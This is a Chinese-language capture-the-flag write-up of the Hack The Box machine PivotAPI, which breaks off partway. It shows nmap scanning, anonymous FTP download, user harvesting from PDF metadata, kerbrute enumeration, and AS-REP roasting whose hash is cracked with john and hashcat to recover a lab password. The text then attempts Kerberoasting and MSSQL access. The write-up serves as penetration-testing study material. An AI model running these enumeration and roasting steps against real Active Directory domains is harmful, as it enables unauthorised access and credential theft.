HTB_machines

cvestone 发布于 2024-01-15 306 次阅读 47189 字 预计阅读时间: 4 小时


Table of Contents

PivotAPI

“红队笔记”学习记录

机器介绍

Pivotapi is an insane machine that involves user enumeration through the metadata of PDFs which are downloaded from a FTP file share server. Since the user has not got preauth with Kerberos it is possible to request a TGT for him which can be cracked with Hashcat. With the provided credentials an SMB enumeration exposes an executable which when reversed engineered reveals credentials to authenticate to MSSQL. After gaining access to the system it is possible to locate a keepass database on the target, leading to further misconfiguration abuse through Active Directory which leads obtaining the Administrator's password through LAPS and thus get execution on the target through `psexec` as user Administrator.
Pivotapi 是一台疯狂的机器,它涉及用户通过从 FTP 文件共享服务器下载的 PDF 元数据进行枚举。由于用户尚未获得 Kerberos 的预身份验证,因此可以为他请求 TGT,这可以通过 Hashcat 破解。使用提供的凭据,SMB 枚举公开一个可执行文件,当进行反向工程时,该可执行文件会显示凭据以向 MSSQL 进行身份验证。在获得对系统的访问权限后,可以在目标上找到一个keepass数据库,从而通过Active Directory导致进一步的错误配置滥用,从而导致通过LAPS获取管理员的密码,从而通过“psexec”作为用户管理员在目标上执行。

难度

Insane

信息搜集

tcp详细扫描:

sudo nmap -sT -sV -sC -O -p$tcports $ip1 -oA nmapscan/tcpdetails
# Nmap 7.94SVN scan initiated Mon Jan 15 15:24:33 2024 as: nmap -sT -sV -sC -O -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389,49667,49677,49678,49710,49784 -oA nmapscan/tcpdetails 10.129.228.115
Nmap scan report for 10.129.228.115 (10.129.228.115)
Host is up (0.38s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  02:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  02:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  11:55AM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  02:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  12:18PM               219091 notes1.pdf
| 08-08-20  12:34PM               279445 notes2.pdf
| 08-08-20  12:41PM                  105 README.txt
|_02-19-21  02:06PM              1301120 RHUL-MA-2009-06.pdf
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-15 08:24:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.129.228.115:1433: 
|     Target_Name: LICORDEBELLOTA
|     NetBIOS_Domain_Name: LICORDEBELLOTA
|     NetBIOS_Computer_Name: PIVOTAPI
|     DNS_Domain_Name: LicorDeBellota.htb
|     DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|     DNS_Tree_Name: LicorDeBellota.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-15T08:22:52
|_Not valid after:  2054-01-15T08:22:52
| ms-sql-info: 
|   10.129.228.115:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-01-15T08:26:05+00:00; +59m39s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49784/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 59m38s, deviation: 0s, median: 59m38s
| smb2-time: 
|   date: 2024-01-15T08:25:25
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 15 15:26:39 2024 -- 1 IP address (1 host up) scanned in 126.25 seconds

nmap漏洞扫描脚本和udp扫描结果并没有显示有价值信息,因此跳过

扫描结果分析

注意到DNS_Computer_Name: PivotAPI.LicorDeBellota.htb和对应ip10.129.228.115,结合所有暴露的端口都符合,可以大概推测这很可能是一台域控制器,因此要写入到hosts文件中便于后续访问;
从渗透的攻击面来看,按照经验优先考虑尝试利用端口21、445、88、3268

利用

ftp匿名登录下载文件

可以用ftp命令进行连接再下载,但是有时候下载过程中容易出问题,需要配置各种参数,比较复杂,并且最重要的是一定要启动binary模式。因此这里选择用wget

wget -m ftp://anonymous:随机密码@LicorDeBellota.htb
初步分析文件,挖掘敏感信息
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# ls
10.1.1.414.6453.pdf                           BHUSA09-McDonald-WindowsHeap-PAPER.pdf  notes1.pdf  README.txt
28475-linux-stack-based-buffer-overflows.pdf  ExploitingSoftware-Ch07.pdf             notes2.pdf  RHUL-MA-2009-06.pdf

发现只有一个txt,其他都是pdf,除了txt,其他先暂时不要轻易打开,查看txt内容:

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat README.txt       
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.

可以先查看剩余文件的元数据,从而快速提取潜在的敏感信息

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# exiftool *.pdf |less

这里用了less方便查看时可以用鼠标自由滚动

发现CreatorAuthor字段的值是比较有潜在价值的,可以利用文本处理工具单独筛选出来:

exiftool *.pdf | grep -iE creator\|author | awk -F ":" '{print $2}' | grep -v -i microsoft | grep -vE '[0-9]' | uniq | tail -n 4 | sort | tee 
pdf_authors

输出结果:

┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat pdf_authors 
 alex
 byron gronseth
 Kaorz
 saif

然后逐步大致浏览一下每个pdf文件的内容,暂时也没有获取到什么敏感的用户凭据信息等,大部分都是和堆栈缓冲区溢出相关的参考资料和论文,并且开头也介绍了论文作者来自的大学,但是目前暂时都没有利用价值,先放在一边备用,等最后没有思路了再仔细看看这些文章

尝试获取smb共享

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# crackmapexec smb $ip1
SMB         10.129.228.115  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
                                                                                                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbmap -H $ip1          

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbclient -L //$ip1 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

通过以上方式尝试无凭据连接smb服务获取共享资源均失败

尝试连接rpc服务

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U '' -N $ip1             
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

这表明在没有任何凭据时是无法连接rpc的

尝试用户名枚举

由于这是在域环境中,所以这里尝试用基于kerberos协议的用户枚举工具kerbrute

kerberos作为网络认证协议,允许在网络上进行节点间的安全身份验证,在kerberos环境中,用户或服务的身份验证是基于密钥而不是密码,kerbrute的用户枚举基于一个kerberos的特性-当一个不存在的用户尝试认证时,kerberos返回一个错误提示:客户端身份未知,但是如果用户名存在、密码错误,kerberos返回另一个错误提示。该工具根据这种特性,对于提供的用户名列表中的每一个用户,分别发送带有错误密码的认证请求,从而根据kerberos的响应来验证给定的用户名是否存在,这种方式快速并且隐蔽,因为只是发送认证请求而不是实际验证,不会触发用户锁定策略

如果是arm架构如苹果芯片的电脑,需要编译,编译时要注意:
在克隆的github库中,修改Makefile文件,在开头的ARCHS=中添加arm64,编译时执行make linux即可,如果有提示缺少什么模块,安装后再重新执行该命令

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kerbrute userenum -d LicorDebellota.htb --dc $ip1 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/27/24 - Ronnie Flathers @ropnop

2024/01/27 17:28:05 >  Using KDC(s):
2024/01/27 17:28:05 >   10.129.228.115:88

2024/01/27 17:28:31 >  [+] VALID USERNAME:       jari@LicorDebellota.htb
2024/01/27 17:31:31 >  [+] VALID USERNAME:       administrador@LicorDebellota.htb
2024/01/27 17:37:38 >  [+] VALID USERNAME:       sshd@LicorDebellota.htb
2024/01/27 17:52:40 >  [+] VALID USERNAME:       lothbrok@LicorDebellota.htb
2024/01/27 18:21:43 >  Done! Tested 8295455 usernames (4 valid) in 3218.585 seconds

这里用-t指定线程数,具体要根据性能和远程服务器的防御机制做权衡,如果设置太快容易被检测拦截。
将新爆破出的用户名添加到最初信息搜集的pdf_authors 中:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp pdf_authors users_list              
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt users_list
#注意这里的nt是我自己重命名的命令                                    
                           
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat users_list           
alex
byron gronseth
byron
gronseth
Kaorz
saif
jari
administrador
sshd
lothbrok

由于第二个用户名是组合的,可以分别拆开作为用户名,扩大可能性

尝试AS-REP ROASTING爆破攻击

域渗透时,每当收集到一组潜在的用户名,就要想到用这种方式,看是否碰巧有某个用户不需要域认证(即标志UF_DONT_REQUIRE_PREAUTH设置为真,将允许启用kerberos的认证过程,尽管我们不能成功认证,但在此过程中可以得到用户凭据哈希TGT,就可以尝试破解该哈希)。PREAUTH是预先身份验证,AS是授权服务,在kerberos认证中,如果启用了预先身份验证,那么在AS返回用户的TGT之前,用户首先需要证明他们知道正确的密码,这样就增加了额外的安全性,然而如果禁用了预先身份验证,攻击者可以请求TGT,即使不知道正确的密码,最后尝试离线破解该加密的TGT即可

这个攻击过程需要用到impacket框架中的GetNPUserspython脚本工具
可以用locate命令来定位,注意要用apt先安装locate并更新好数据库:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# updatedb

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# locate -i getnp       
/pentest/impacket/build/scripts-3.11/GetNPUsers.py
/pentest/impacket/examples/GetNPUsers.py
/usr/local/bin/GetNPUsers.py
/usr/local/bin/__pycache__/GetNPUsers.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
# 复制最后这个路径并添加软链接:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetNPUsers.py /usr/bin/GetNPUsers.py
                            
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -h    
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address] [-dc-host hostname]
                     target

Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

positional arguments:
  target                [[domain/]username[:password]]

options:
  -h, --help            show this help message and exit
  -request              Requests TGT for users and output them in JtR/hashcat format (default False)
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -format {hashcat,john}
                        format to save the AS_REQ of users without pre-authentication. Default is hashcat
  -usersfile USERSFILE  File with user per line to test
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

执行脚本:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -no-pass -dc-ip $ip1 LicorDebellota.htb/ -usersfile users_list
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User jari doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrador doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lothbrok doesn't have UF_DONT_REQUIRE_PREAUTH set

注意这里的域名后要加上/,从结果中我们提取到了用户Kaorz的TGT哈希:$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3

这里就存在一个疑问,为什么kerberos要将某些用户启用预先身份验证,有些又不需要呢?这里有以下几种可能原因:

(1)兼容性问题。早期的kerberos客户端可能不支持这种预先身份验证,所以某些用户已经设置了该标志已确保与早期的kerberos客户端兼容;
(2)简化身份验证的需求。在某些情况下,域管理员希望消除这种预身份验证步骤以简化身份验证过程;
(3)特定应用程序或服务的要求
所以根据这些不可控的因素,导致攻击者有空子可以钻

将提取到的hash值单独存放一个文件中,并用john或者hashcat破解:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                          
└─# john --wordlist=/usr/share/wordlists/rockyou.txt Kaorz_hash                                                                     
Using default input encoding: UTF-8                                                 
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])                                                                   
Will run 20 OpenMP threads                                                     
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                                                                    
Roper4155        ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)                                                                                                                                        
1g 0:00:00:03 DONE (2024-01-27 23:32) 0.2652g/s 2830Kp/s 2830Kc/s 2830KC/s S100195..Ronald8                                                                                                      
Use the "--show" option to display all of the cracked passwords reliably                                                                                                                         
Session completed.                                                                     
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                                                                                                          
└─# hashcat --help | grep -i rep                                                                                                                                                                 
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16                                                                     
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol                                                                                                          
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol                                                                                                          
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol                                                                                                          
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol                                            
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]                                                                                                                                          
└─# hashcat -m 18200 Kaorz_hash /usr/share/wordlists/rockyou.txt                                                                                                                                 
hashcat (v6.2.6) starting                                                                         
OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                               
==================================================================================================================================================                                               
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU                                                                                      

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256 

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 5 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff77395
6ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1
e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3:Roper4155
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c...f59cb3
Time.Started.....: Sat Jan 27 23:34:25 2024 (2 secs)
Time.Estimated...: Sat Jan 27 23:34:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5252.7 kH/s (2.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10670080/14344385 (74.39%)
Rejected.........: 0/10670080 (0.00%)
Restore.Point....: 10649600/14344385 (74.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SEXY#2 -> RonaldoNathan
Hardware.Mon.#1..: Temp: 62c Util: 65%

Started: Sat Jan 27 23:34:09 2024
Stopped: Sat Jan 27 23:34:27 2024

两种方式都爆破出了密码Roper4155,将该凭据记录到临时渗透笔记中。注意这里当使用hashcat破解前,可以先利用hash值中的可能标志来查找hashcat破解的hash类型,即确定-m,这种类型特征标志一般是在开头的前部分,从上面也可以看出这种情况下使用john更快速简易,因为john会自动判断类型
获得凭据后,尝试是否能连接到对应服务,尝试连接ssh,发现无法连接,说明该用户没有创建ssh

尝试KERBEROASTING爆破攻击

这种攻击同样是在域环境中的,针对那些关联了服务主体名称的账号,通常是服务账号,例如数据库、web应用程序等,一旦攻击者在域环境中有一个有效的凭据,不一定是高权限的用户,普通用户凭据通常就足够,可以请求与特定SPN关联的服务票据,这些票据是使用服务账号进行加密的,攻击者同样也可以尝试捕获这些服务票据,并且离线破解出服务账号明文密码。与AS-REP ROASTING相似,两者都是利用kerberos的设计特性而非真正的漏洞,且KERBEROASTING攻击需要一个用户凭据为前提,而AS-REP ROASTING不需要

同样也是利用impacket框架中的python脚本

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# locate -i spns                                                                                                                                                                               
/pentest/impacket/build/scripts-3.11/GetUserSPNs.py                                                                                                                                              
/pentest/impacket/examples/GetUserSPNs.py                                                                                                                                                        
/usr/local/bin/GetUserSPNs.py                                                                                                                                                                    
/usr/local/bin/__pycache__/GetUserSPNs.cpython-311.pyc                                                                                                                                           
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetUserSPNs.py                                                                  
/usr/share/doc/metasploit-framework/modules/auxiliary/gather/get_user_spns.md                                                                                                                    
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py                                                                                                                                          
/usr/share/metasploit-framework/modules/auxiliary/gather/get_user_spns.py                                                                                                                        
                                                                                                                                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# ln -s /usr/share/doc/python3-impacket/examples/GetUserSPNs.py /usr/bin/GetUserSPNs.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -h                                      
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-ts] [-debug]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
                      target

Queries target domain for SPNs that are running under a user account

positional arguments:
  target                domain[/username[:password]]

options:
  -h, --help            show this help message and exit
  -target-domain TARGET_DOMAIN
                        Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
  -stealth              Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption / errors on large domains.
  -usersfile USERSFILE  File with user per line to test
  -request              Requests TGS for users and output them in JtR/hashcat format (default False)
  -request-user username
                        Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
  -save                 Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

尝试攻击:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -dc-ip $ip1 LicorDebellota.htb/kaorz:Roper4155
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

No entries found!

说明该用户不与任何SPN相关联

尝试获取数据库凭据

重新查看扫描的端口,与获取凭据相关的还有数据库服务,利用方式同样可以使用impacket框架中的python脚本

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# locate -i mssqlcli                                                                                                                                                                           
/pentest/impacket/build/scripts-3.11/mssqlclient.py                                                                                                                                              
/pentest/impacket/examples/mssqlclient.py                                                                                                                                                        
/usr/local/bin/__pycache__/mssqlclient.cpython-311.pyc                                                                                                                                           
/usr/local/bin/mssqlclient.py                                                                                                                                                                    
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/mssqlclient.py                                                                  
/usr/share/doc/python3-impacket/examples/mssqlclient.py                                                                                                                                          
                                                                                                                                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# ln -s /usr/share/doc/python3-impacket/examples/mssqlclient.py /usr/bin/mssqlclient.py                                                                                                        
                                                
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                  
└─# mssqlclient.py -h                                                                           
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
                                                                                                
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-show] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
                                                                                                
TDS client implementation (SSL supported).                                                      
                                                                                                                                                                                                 
positional arguments:                                                                           
  target                [[domain/]username[:password]@]<targetName or address>                  
                                                                                                                                                                                                 
options:                                                                                        
  -h, --help            show this help message and exit              
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON                                                    
  -show                 show the queries                                                        
  -file FILE            input file with commands to execute in the SQL shell
                                                                                                
authentication:                                                                                 
  -hashes LMHASH:NTHASH                         
